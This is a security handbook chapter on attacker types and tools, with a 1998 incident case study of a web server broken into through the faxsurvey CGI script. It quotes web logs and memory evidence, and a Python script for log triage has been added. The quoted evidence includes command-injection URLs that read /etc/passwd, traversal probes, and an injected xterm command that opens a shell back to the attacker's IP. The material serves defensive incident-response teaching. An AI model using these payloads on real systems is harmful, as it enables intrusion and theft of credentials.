One of the more controversial debates in software design is whether development processes that make source code freely available to users to inspect, modify, and redistribute ("free software" or "open source" software) should be preferred to proprietary ("closed source") development on the basis of security. On the one hand, freely available source code makes it easier for attackers to find exploitable bugs in a program by reading its source code. Because there are many common classes of program errors that lead to vulnerabilities, source code can sometimes even be submitted to automated analysis to turn up bugs. Bugs have certainly been found and exploited in open source software.

On the other hand, closed source is not a panacea. In many cases, programs can be reverse-engineered, or vulnerabilities can be spotted through "black box" testing of a program without the source code. Clearly, lack of availability of the source code for Microsoft's Internet Information Server, for example, has not prevented attackers from exploiting several vulnerabilities, and this product seems to have a higher rate of exploits reported than, for example, the Apache web server. Open source development can make it easier for program developers and users to spot and fix bugs before attackers find them. The OpenBSD operating system, which is free software, is widely acknowledged as one of the most secure operating systems currently available, in large part because it has had a security audit of every line of kernel source code by its developers. Other open source operating system kernels, including Linux, are not as heavily vetted and contain code from many developers. It is difficult to know the degree to which proprietary Unix operating systems such as Solaris have been audited for security.

Understanding Your Adversaries

Who is breaking into networked computers with the most sophisticated of attacks?
It almost doesn't matter--no matter who the attackers may be, they all need to be guarded against.

Script kiddies

As clichéd as it may sound, in many cases the attackers are children and teenagers--people who sadly have not (yet) developed the morals or sense of responsibility that is sufficient to keep their technical skills in check. It is common to refer to young people who use sophisticated attack tools as script kiddies. The term is derisive. The word "script" implies that the attackers use readily available attack scripts that can be downloaded from the Internet to do their bidding, rather than creating their own attacks. And, of course, the attackers are called "kiddies" because so many of them turn out to be underage when they are apprehended.

Script kiddies should be considered a serious threat and feared for the same reason that teenagers with guns should be feared. In many cases, teenagers with handguns should be feared even more than adults, because a teenager is less likely to understand the consequences of his actions should he pull the trigger and thus more likely to pull it. The same is true of script kiddies. In May 2001, for instance, the web site of Gibson Research Corporation was the subject of a devastating distributed denial-of-service attack that shut down its web site for more than 17 hours. The attack was orchestrated by more than 400 Windows computers around the Internet that had been compromised by an automated attack. As it turns out, Steve Gibson was able to get a copy of the attack program, reverse-engineer it, and trace it back. It turned out that his attacker was a 13-year-old girl.
Likewise, when authorities in Canada arrested "Mafiaboy" on April 19, 2000, for the February 2000 attacks on Yahoo, E*TRADE, CNN, and many other high-profile sites--attacks that caused more than $1.7 billion in damages--they couldn't release the suspect's name to the public because the 16-year-old was shielded by Canada's laws protecting the privacy of minors.[208]

Script kiddies may not have the technical skills necessary to write their own attack scripts and Trojan horses, but it hardly matters. They have the tools and increasingly they show few reservations about using them. Either they do not understand the grave damage they cause, or they do not care.

What does a script kiddie do when he grows up? Nobody is really sure--to date, there are no reliable studies. Anecdotal reports suggest that many script kiddies go straight. Some lose interest in computers; some become system operators and network administrators; and some even go into the field of computer security. (The wisdom of hiring one of these individuals to watch over your network is a matter of debate within the computer security community.) But it is unquestionably clear that some individuals continue their lives of crime.

Industrial spies

There appears to be a growing black market for information stolen from computer systems. Some individuals have tried to ransom or extort the information from its rightful owners--for example, by offering to help a company close its vulnerabilities in exchange for a large cash payment. There have been several documented cases (and perhaps many more unreported) in which criminals have stolen credit card numbers of clients from a company's server and threatened to post the information unless the company paid them. There have also been reports of attackers who have tried to sell industrial secrets to competitors of the companies that they have penetrated. Such transactions are illegal in the United States and in many other countries, but not in all.
Ideologues and national agents

There is a small but growing population of "hacktivists" who break into sites for ideological or political reasons. Often, the intent of these people is to deface web pages to make a statement of some kind: defacement of law enforcement agencies' sites, destruction of web sites by environmental groups, or destruction of research computing sites involved in animal studies, to give some examples. Sometimes, the protesters are making a political statement; they may be advancing an ideological cause, or they may merely be anarchists striking a blow against technology or business. Sometimes, these incidents may be carried out against national interests. For instance, a guerilla movement may deface sites belonging to a government opponent. In other cases, you see individuals in one jurisdiction attempting to make some point by attacking sites in another, such as in the Israeli-Palestinian conflict, the ongoing tension between Pakistan and India, and the aftermath of the accidental bombing of the Chinese embassy by U.S. forces. Many of these attacks may be spontaneous, but some may be coordinated or financed by the governments themselves.

[208] http://news.cnet.com/news/0-1005-200-4523277.html

Information Technology Security Handbook IT SECURITY FOR TECHNICAL ADMINISTRATORS 199

These incidents can also affect third parties. For instance, during a Chinese crackdown, many ISPs around the world hosting web pages of adherents of Falun Gong found their servers under attack from sites inside China. Because of the coordination and replication of the attacks, authorities believed they were actually state-sponsored. ISPs have been attacked by vigilantes because they sell service to spammers, provide web service for hate groups, or seem to be associated with child pornographers--even if the ISP owners and operators were unaware of these activities!

Organized crime

Vast amounts of valuable information and financial data flow through the Internet.
It would be naive to believe that the criminal element is unaware of this, or is uninterested in expanding into the networked world. There have been incidents of fraud, information piracy, and money laundering conducted online that officials believe are all related to organized crime. Communications on the Net have been used to advance and coordinate prostitution and pornography, gambling, trafficking in illegal substances, gun running, and other activities commonly involving organized crime. Furthermore, law enforcement sites may be targeted by criminals to discover what is known about them, or to discover identities of informants and witnesses.

With network globalization, the threats have a longer reach. The Russian mob, Sicilian Mafia, Japanese Yakuza, South American drug families, and Los Angeles gangs (to name a few) are all a few mouse clicks away on the network. Many law enforcement officials worry as a result that the Internet is a "growth" area for crime in the coming decade.

Rogue employees and insurance fraud

Finally, there are many cases of tactically skilled employees who have turned against their employers out of revenge, malice, or boredom. In some cases, terminated employees have planted Trojan horses or logic bombs in their employer's computers. In other cases, computer systems have been destroyed by employees as part of insurance scams.

What the Attacker Wants

Compromising a computer system is usually not an end in itself. Instead, most attackers seek to use compromised systems as a stepping-stone for further attacks and vandalism.
After an attacker compromises a system, the system can be used for many nefarious purposes, including:

· Launching probes or exploits against other systems
· Participating in distributed denial-of-service (DDOS) attacks
· Running covert servers (e.g., the attacker might set up an Internet Relay Chat server that will act as a rendezvous point for Trojan horses and viruses that are sending back captured data)
· Covertly monitoring the network of the organization that owns the compromised system, with the goal of compromising more systems
· Becoming a repository for attack tools, pirated software, pornography, or other kinds of contraband information

There are many reasons that compromised systems make excellent platforms for these kinds of illegal activities. If a compromised system is connected to a high-speed Internet connection, the system may be able to do much more damage and mayhem than other systems that the attacker controls. Compromised systems can also be used to make it more difficult for authorities to trace an attacker's actions back to the person behind the keyboard. If an attacker hops through many computers in different jurisdictions--for example, from a compromised Unix account in France to a Windows proxy server in South Korea to an academic computer center in Mexico to a backbone router in New York--it may be effectively impossible to trace the attacker backward to the source.

Tools of the Attacker's Trade

A smattering of tools that have been commonly used by attackers would include:

nc (a.k.a. netcat)
Originally written by "Hobbit," netcat is the Swiss Army knife for IP-based networks. As such, it is a valuable diagnostic and administrative tool as well as useful to attackers. You can use netcat to send arbitrary data to arbitrary TCP/IP ports on remote computers, to set up local TCP/IP servers, and to perform rudimentary port scans.

trinoo (a.k.a. trin00)
trinoo is the attack server.
trinoo waits for a message from a remote system and, upon receiving the message, launches a denial-of-service attack against a third party. Versions of trinoo are available for most Unix operating systems, including Solaris and Red Hat Linux. The presence of trinoo is usually hidden. A detailed analysis of trinoo can be found at http://staff.washington.edu/dittrich/misc/trinoo.analysis.

Back Orifice and Netbus
These Windows-based programs are Trojan horses that allow an attacker to remotely monitor keystrokes, access files, upload and download programs, and run programs on compromised systems.

bots
Short for robots, bots are small programs that are typically planted by an attacker on a collection of computers scattered around the Internet. Bots are one of the primary tools for conducting distributed denial-of-service attacks and for maintaining control on Internet Relay Chat channels. Bots can be distributed by viruses or Trojan horses. They can remain dormant for days, weeks, or years until they are activated. Bots can even engage in autonomous actions.

root kits
A root kit is a program or collection of programs that simultaneously gives the attacker superuser privileges on a computer, plants back doors on the computer, and erases any trace that the attacker has been present. Originally, root kits were designed for Unix systems (hence the name "root"), but root kits have been developed for Windows systems as well. A typical root kit might attempt a dozen or so different exploits to obtain superuser privileges. Once superuser privileges are achieved, the root kit might patch the login program to add a back door, then modify the computer's kernel so that any attempt to read the login program returns the original, unmodified program, rather than the modified one. Commands might be modified so that network connections from the attacker's machine are not displayed. Finally, the root kit might then erase the last five minutes of the computer's log files.
Worms
Worms exploiting vulnerabilities in network servers or networking components of operating systems have become a common way to compromise large numbers of computers at once.

Case Study: Faxsurvey

On October 7, 1998, an employee at Vineyard.NET noticed that the user http was logged in to the company's primary web server:

    Script started on Wed Oct 7 20:54:21 1998
    bash-2.02# w
     8:57PM  up 27 days, 14:19, 5 users, load averages: 0.28, 0.33, 0.35
    USER     TTY  FROM               LOGIN@   IDLE WHAT
    http     p0   KRLDB110-06.spli   Tue02AM 1days /bin/sh
    simsong  p1   asy12.vineyard.n    8:42PM    15 -tcsh (tcsh)
    ericx    p2   mac-ewb.vineyard    8:46PM     0 script
    ericx    p3   mac-ewb.vineyard    8:46PM    11 top
    ericx    p4   mac-ewb.vineyard    8:53PM     1 sleep 5
    bash-2.02#

This computer was running the BSDI v3.1 operating system with all patches as released by the vendor. The web server was a version of the Apache web server named Stronghold. The computer was used to initiate Automated Clearing House electronic funds transfers from customer accounts. To assist in these funds transfers, the computer held credit card and bank account information. (Fortunately, that information on the computer was stored in an encrypted format.)

In all likelihood, a user logged in as http could be the result of two things. First, it could be a member of the ISP's staff who was using the http account for debugging. Alternatively, it could be an attacker who had found some way to break into the http account, but had been unable to gain additional access. Because the user http was logged in from a computer whose name began KRLDB110-06.spli, it appeared to the staff that this was a case of unauthorized access.

When the intrusion was discovered, one of the staff members immediately started the Unix program script to record his actions. The intruder appeared to be idle for more than a day. The original intrusion had taken place on Tuesday at 2:00 a.m.
The next step was to list all of the processes currently running on the computer. Two processes were out of place -- they were two copies of the /bin/sh shell that were being run by http. Both of those shells had been started on the previous day, one at 2:00 a.m., the other at 4:00 a.m.:

    bash-2.02# ps auxww
    USER    PID %CPU %MEM  VSZ   RSS TT  STAT STARTED    TIME COMMAND
    root  11766  3.0  0.0    0     0 ??  Z    23Sep98 0:00.00 (admin_server)
    root   3763  1.0  0.0    0     0 ??  Z     2:03PM 0:00.00 (junkbuster)
    mail  18120  1.3  0.3  816   724 ??  S     8:56PM 0:00.64 smap
    root  17573  1.0  0.0    0     0 ??  Z    11:03AM 0:00.00 (admin_server)
    root     16  0.0  0.0   68    64 ??  Is   10Sep98 0:00.00 asyncd 2
    root     18  0.0  0.0   68    64 ??  Is   10Sep98 0:00.02 asyncd 2
    root     28  0.0  8.0  748 20680 ??  Ss   10Sep98 0:16.32 mfs -o rw -s 40960 /dev/sd0b /tmp (mount_mfs)
    root     53  0.0  0.1  268   296 ??  Ss   10Sep98 0:38.23 gettyd -s
    ...
    root  18670  0.0  0.5  560  1276 ??  S    Tue02AM 0:04.77 (xterm)
    http  18671  0.0  0.1  244   276 p0  Is   Tue02AM 0:02.23 /bin/sh
    http  26225  0.0  0.1  236   276 p0  I+   Tue04AM 0:00.07 /bin/sh

Apparently, the intruder had broken in and then, for some reason, had given up. As there appeared to be no immediate urgency, the ISP carefully formulated a plan of action:

1. Do not alert the intruder about what is happening.
2. Determine the intruder's source IP address.
3. Use the Unix kill command to STOP the intruder's processes. This signal would prevent the processes from running while leaving a copy in memory.
4. Make a copy of the intruder's processes using the Unix gcore command.
5. Place a rule on the ISP router to block packets from the intruder's ISP.
6. Kill the intruder's processes unequivocally with kill -9.
7. Determine how the intruder had broken in and fix the hole.
8. Alert law enforcement.

To trace the intruder, the ISP tried using the netstat command. This turned up a new piece of information.
The intruder had not broken in with Telnet or SSH; instead, there was an X11 connection from the web server (Apache.Vineyard.NET) to an X server running on the intruder's computer:

    bash-2.02# netstat -a
    Active Internet connections (including servers)
    Proto Recv-Q Send-Q  Local Address           Foreign Address         (state)
    tcp        0      0  VINEYARD.NET.http       nhv-ct4-09.ix.ne.1137   SYN_RCVD
    tcp        0      0  VINEYARD.NET.http       nhv-ct4-09.ix.ne.1136   SYN_RCVD
    tcp        0      0  VINEYARD.NET.http       nhv-ct4-09.ix.ne.1135   SYN_RCVD
    tcp        0      0  VINEYARD.NET.http       DSY27.VINEYARD.N.1079   SYN_RCVD
    tcp        0   2456  VINEYARD.NET.http       nhv-ct4-09.ix.ne.1134   ESTABLISHED
    tcp        0   2268  VINEYARD.NET.http       DSY27.VINEYARD.N.1078   ESTABLISHED
    tcp        0   2522  VINEYARD.NET.http       209.174.140.26.1205     ESTABLISHED
    tcp        0   8192  VINEYARD.NET.http       host-209-214-118.1785   ESTABLISHED
    tcp        0   4916  VINEYARD.NET.http       host-209-214-118.1784   ESTABLISHED
    tcp        0      0  VINEYARD.NET.http       host-209-214-118.1783   ESTABLISHED
    tcp        0      0  VINEYARD.NET.http       ASY14.VINEYARD.N.1163   FIN_WAIT_2
    tcp        0      0  LOCALHOST.VINEYA.sendm  LOCALHOST.VINEYA.1135   ESTABLISHED
    tcp        0      0  LOCALHOST.VINEYA.1135   LOCALHOST.VINEYA.sendm  ESTABLISHED
    tcp        0      0  VINEYARD.NET.smtp       208.135.218.34.1479     ESTABLISHED
    tcp        0   3157  VINEYARD.NET.pop        ASY5.VINEYARD.NE.1027   ESTABLISHED
    tcp        0      0  APACHE.VINEYARD..ssh    MAC-EWB.VINEYARD.2050   ESTABLISHED
    tcp        0      0  VINEYARD.NET.http       host-209-214-118.1782   FIN_WAIT_2
    tcp        0      0  VINEYARD.NET.http       host-209-214-118.1781   FIN_WAIT_2
    tcp        0      0  VINEYARD.NET.http       host-209-214-118.1775   FIN_WAIT_2
    tcp        0      0  VINEYARD.NET.http       56k-2234.hey.net.1099   FIN_WAIT_2
    tcp        0      0  VINEYARD.NET.https      ESY8.VINEYARD.NE.1557   FIN_WAIT_2
    tcp        0      0  LOCALHOST.VINEYA.sendm  LOCALHOST.VINEYA.1058   ESTABLISHED
    tcp        0      0  LOCALHOST.VINEYA.1058   LOCALHOST.VINEYA.sendm  ESTABLISHED
    tcp        0      0  APACHE.VINEYARD..smtp   m28.boston.juno..54519  ESTABLISHED
    tcp        0      0  APACHE.VINEYARD..ssh    MAC-EWB.VINEYARD.nfs    ESTABLISHED
    tcp        0    328  APACHE.VINEYARD..ssh    MAC-EWB.VINEYARD.2048   ESTABLISHED
    tcp        0      0  VINEYARD.NET.http       ASY14.VINEYARD.N.1162   FIN_WAIT_2
    tcp        0      0  VINEYARD.NET.http       ASY14.VINEYARD.N.1160   FIN_WAIT_2
    tcp        0      0  NEXT.VINEYARD.NE.ssh    ASY12.VINEYARD.N.1047   ESTABLISHED
    tcp        0   7300  VINEYARD.NET.pop        DSY27.VINEYARD.N.1061   ESTABLISHED
    tcp        0      0  NEXT.VINEYARD.NE.imap2  ASY12.VINEYARD.N.1041   ESTABLISHED
    tcp        0      0  VINEYARD.NET.3290       VINEYARD.NET.imap2      CLOSE_WAIT
    tcp        0      0  VINEYARD.NET.ssh        simsong.ne.media.1017   ESTABLISHED
    tcp        0      0  APACHE.VINEYARD..3098   KRLDB110-06.spli.X11    ESTABLISHED
    tcp     8760      0  VINEYARD.NET.1022       BACKUP.VINEYARD..ssh    ESTABLISHED
    tcp        0      0  LOCALHOST.VINEYA.4778   *.*                     LISTEN
    tcp        0      0  LOCALHOST.VINEYA.domai  *.*                     LISTEN
    tcp        0      0  NET10.VINEYARD.N.domai  *.*                     LISTEN
    tcp        0      0  SMTP4.VINEYARD.N.domai  *.*                     LISTEN

The ISP concluded that the attacker had used a vulnerability in a CGI script to spawn an xterm back to his remote machine. To test this hypothesis, the ISP did a quick search through its web server logs:

    % grep -i krldb110-06 /vni/apache/log/access_log
    1.  krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    2.  krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    3.  krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/view-source?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    4.  krldb110-06.splitrock.net - - [06/Oct/1998:02:53:53 -0400] "GET /cgi-bin/htmlscript?../../../../../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    5.  krldb110-06.splitrock.net - - [06/Oct/1998:02:53:54 -0400] "GET /cgi-bin/campas?%0als%20-lFa HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    6.  krldb110-06.splitrock.net - - [06/Oct/1998:02:53:55 -0400] "GET /cgi-bin/handler/useless_shit;ls%20-lFa|?data=Download HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    7.  krldb110-06.splitrock.net - - [06/Oct/1998:02:53:56 -0400] "GET /cgi-bin/php.cgi?/etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    8.  krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.1" 200 5516 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    9.  krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] "GET /cgi-bin/faxsurvey?uname%20-a HTTP/1.1" 200 461 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    10. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:03 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    11. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1" 200 79467 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    12. krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/ HTTP/1.1" 200 1701 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/biz/captiva"
    13. krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
    14. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] "GET /cgi-bin/faxsurvey?pwd HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
    15. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] "GET /cgi-bin/faxsurvey?/bin/pwd HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
    16. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.1" 200 5516 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"
    17. krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/ HTTP/1.1" 200 305 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)" "/htdocs/web.vineyard.net"

Notice that lines 1-7 each occur within a few seconds of each other. It appears that the attacker is using an automated tool that checks for CGI vulnerabilities. In lines 8-17 the attacker exploits a vulnerability in the faxsurvey script. This was almost certainly done with a different tool; one indication is that the version of the HTTP protocol that the client supports changes from "HTTP/1.0" to "HTTP/1.1".

The web server log file revealed that the full hostname of the attacker was krldb110-06.splitrock.net. Using the host command, this name could be translated into an actual IP address:

    apache: {43} % host krldb110-06.splitrock.net
    krldb110-06.splitrock.net has address 209.156.113.121
    apache: {44} %

By inspecting the log file, it appears that the script /cgi-bin/faxsurvey has a bug that allows the attacker to execute arbitrary commands. (Otherwise, why else would the attacker keep sending URLs calling the same script with different arguments?) If this is true, then the following commands must have been executed by the attacker:

    ls -lFa
    ls -lFa
    uname -a
    id
    cat /etc/passwd
    ls -lFa /usr/
    id
    pwd
    /bin/pwd
    ls -lFa
    ls -lFa ../conf/

It is not clear from the log files how the attacker was able to go from executing these commands to executing the xterm command. But it is very clear that the xterm command was executed, as evidenced by the http entry in the output of the w command, the running (xterm) process, and the X11 entry in the netstat output. At this point, the ISP searched for the attacker's hostname in other log files.
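The log reading the case study does by hand can be automated. The following is an added example, not code from the handbook or from Vineyard.NET: it parses the access_log entries above, flags the burst of requests that marks an automated CGI scanner, reports the HTTP/1.0 to HTTP/1.1 change that marks a change of tool, and recovers the commands passed to faxsurvey. The log field layout and the 5-second burst threshold are assumptions.

```python
"""Triage of Stronghold/Apache access_log lines for CGI probing and command injection.

Added example; not code from the handbook or from the ISP in the case study.  It
re-derives the three findings the case study reached by hand: a burst of requests
from an automated CGI scanner, a change of client tool visible as an HTTP version
change, and the commands handed to /cgi-bin/faxsurvey.  The log lines are copied
from the case study (user-agent and document-root fields trimmed); the field
layout and the burst thresholds are assumptions.
"""
import re
from datetime import datetime
from urllib.parse import unquote, urlsplit

# Common-log-format prefix; whatever follows the size field is ignored.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_LOG = """\
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:48 -0400] "GET /cgi-bin/phf?Qname=me%0als%20-lFa HTTP/1.0" 404 -
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:50 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.0" 200 5469
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:52 -0400] "GET /cgi-bin/view-source?../../../../../../../../etc/passwd HTTP/1.0" 404 -
krldb110-06.splitrock.net - - [06/Oct/1998:02:53:54 -0400] "GET /cgi-bin/campas?%0als%20-lFa HTTP/1.0" 404 -
krldb110-06.splitrock.net - - [06/Oct/1998:02:54:30 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.1" 200 5516
krldb110-06.splitrock.net - - [06/Oct/1998:02:54:44 -0400] "GET /cgi-bin/faxsurvey?uname%20-a HTTP/1.1" 200 461
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:03 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:39 -0400] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.1" 200 79467
krldb110-06.splitrock.net - - [06/Oct/1998:02:55:44 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa%20/usr/ HTTP/1.1" 200 1701
krldb110-06.splitrock.net - - [06/Oct/1998:04:31:55 -0400] "GET /cgi-bin/faxsurvey?id HTTP/1.1" 200 381
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:01 -0400] "GET /cgi-bin/faxsurvey?pwd HTTP/1.1" 200 305
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:08 -0400] "GET /cgi-bin/faxsurvey?/bin/pwd HTTP/1.1" 200 305
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:33 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa HTTP/1.1" 200 5516
krldb110-06.splitrock.net - - [06/Oct/1998:04:32:55 -0400] "GET /cgi-bin/faxsurvey?ls%20-lFa%20../conf/ HTTP/1.1" 200 305
"""

def parse_line(line):
    """One access-log line as a dict, or None if it does not match LOG_RE."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["uri"])
    return {"host": m["host"],
            "when": datetime.strptime(m["when"], "%d/%b/%Y:%H:%M:%S %z"),
            "script": parts.path,
            "query": unquote(parts.query),  # %20 and %0a hide spaces and newlines
            "proto": m["proto"], "status": int(m["status"])}

def parse_log(text):
    return [e for e in map(parse_line, text.splitlines()) if e]

def scanner_bursts(entries, max_gap=5, min_scripts=3):
    """Runs of requests from one host, each at most max_gap seconds after the
    previous one, that touch min_scripts or more distinct CGI programs.  Nobody
    types a new CGI URL by hand every two seconds; that cadence is a scanner."""
    runs, run = [], []
    for e in entries:
        if run and (e["host"] != run[-1]["host"] or
                    (e["when"] - run[-1]["when"]).total_seconds() > max_gap):
            runs.append(run)
            run = []
        run.append(e)
    runs.append(run)
    return [r for r in runs if len({x["script"] for x in r}) >= min_scripts]

def protocol_changes(entries):
    """(timestamp, old, new) wherever one host's HTTP version changes, a sign
    that a different client program took over the session."""
    last, changes = {}, []
    for e in entries:
        prev = last.get(e["host"])
        if prev and prev != e["proto"]:
            changes.append((e["when"], prev, e["proto"]))
        last[e["host"]] = e["proto"]
    return changes

def cgi_commands(entries, script="/cgi-bin/faxsurvey", ok_only=True):
    """Decoded arguments handed to one CGI script.  When the script feeds its
    argument to eval or a shell, this list is the attacker's command history."""
    return [e["query"] for e in entries
            if e["script"] == script and e["query"]
            and (not ok_only or e["status"] == 200)]

def triage(text):
    entries = parse_log(text)
    return {"bursts": scanner_bursts(entries),
            "protocol_changes": protocol_changes(entries),
            "commands": cgi_commands(entries)}

if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    for run in report["bursts"]:
        span = (run[-1]["when"] - run[0]["when"]).total_seconds()
        print(f"scanner burst: {len(run)} requests from {run[0]['host']} in {span:.0f}s")
    for when, old, new in report["protocol_changes"]:
        print(f"client changed from {old} to {new} at {when:%H:%M:%S}")
    print("commands passed to faxsurvey:", *report["commands"], sep="\n  ")
```

Run against a full access_log, the same functions will also surface requests the grep for one hostname would miss, such as a second probing host using the same scanner.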
A suspicious result was found in the messages log file -- apparently the attacker had attempted to exploit a POP or qpopper bug:

    apache: {15} % grep -i krldb110-06 *
    messages:Oct  6 03:38:29 apache popper.bsdos[22312]: @KRLDB110-06.splitrock.net: -ERR POP timeout

To preserve the record of the attacker's processes, they were stopped, an image of the process memory was saved, and then the processes were killed. Following this, a rule was added to the ISP's routers to block access from the attacker's IP addresses. Permissions on the faxsurvey script were changed to prevent any access, pending an investigation. A few days later, the script was removed from the web server.

The attacked ISP contacted SplitRock Services, Inc., the ISP that was responsible for the IP address. It was determined that SplitRock operated several modem pools that were provided to another ISP (Prodigy) on a leasing arrangement. SplitRock was asked to preserve its logfiles so that they could be used in a future legal investigation.

By using the Unix strings command over the process memory image files, it was possible to extract significantly more information about the attacker. One group of strings was from the shell history that was, effectively, a list of the commands that the attacker had typed.
The attacker appeared to have downloaded a rootkit, and also to have attempted to get a buffer overflow attack to work properly against the system's IMAP server:

    -lFa
    gcc -o s s.c
    st2.c
    ftp 209.156.113.121
    cron.c
    gcc -o s st2.c
    cxterm.c
    ./s console
    x2.c
    t
    .s
    qpush.c
    .121
    cat t.c
    qpush.c
    cat .c
    ppp.c
    cat s.c
    t2.c
    gc c cron.c
    ls -lFa
    cxterm.c
    ./s -v c2
    tcsh
    ./s p0
    x2.c
    ls -lFa /
    README
    cat .s
    README.debian
    ls -lFa qpush
    cat /w
    qpush.c
    ls -lFa /
    qpush.c.old
    cat .s
    Gf: not found
    _=.s
    /tmp
    $ : not found
    mfs:28
    gcc -o s steal.c
    /bin/sh
    ls -lFa *.c
    /bin/sh
    /bin/sh
    /etc/inetd.conf
    qpush.c
    /usr/bin/gcc
    n/gcc
    ./cc
    Expr Done
    /bin/sh
    inetd.conf
    t) | telnet 127.1 143
    cd /etc
    cat .s
    which pwd
    ls -lFa
    expr $L + 1
    ls -lFa
    ./cc -10
    ./cc

The second kind of strings found in the memory images corresponded to shell environment variables. Many of these were variables that would be set for a process spawned from a CGI script -- confirming that the shell was, in fact, the result of a CGI attack. This block confirmed that the CGI script responsible for the intrusion was the faxsurvey script.

    GATEWAY_INTERFACE=CGI/1.1
    REMOTE_HOST=krldb110-06.splitrock.net
    MACHTYPE=i386-pc-bsdi3.1
    HOSTNAME=apache.vineyard.net
    L=100
    SHLVL=1
    REMOTE_ADDR=209.156.113.121
    QUERY_STRING=/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
    DOCUMENT_ROOT=/htdocs/biz/captiva
    REMOTE_PORT=4801
    HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)
    HTTP_ACCEPT=application/vnd.ms-excel, application/msword, application/vnd.ms-powerpoint, */*
    SCRIPT_FILENAME=/vni/cgi-bin/faxsurvey
    HTTP_HOST=www.captivacruises.com
    LOGNAME=http
    WINDOWID=8388621
    _=/bins
    REQUEST_URI=/cgi-bin/faxsurvey?/usr/X11R6/bin/xterm%20-display%20209.156.113.121:0.0%20-rv%20-e%20/bin/sh
    SERVER_SOFTWARE=Stronghold/2.2 Apache/1.2.5 C2NetUS/2002
    TERM=xterm
    HTTP_CONNECTION=Keep-Alive
    PATH=/usr/local/bin:/bin:/usr/bin:/usr/sbin
    HTTP_ACCEPT_LANGUAGE=en-us
    DISPLAY=209.156.113.121:0.0
    SERVER_PROTOCOL=HTTP/1.1
    HTTP_ACCEPT_ENCODING=gzip, deflate
    SHELL=/bin/tcsh
    REQUEST_METHOD=GET
    OSTYPE=bsdi3.1
    SERVER_ADMIN=mvol@vineyard.net
    SERVER_ROOT=/usr/local/apache
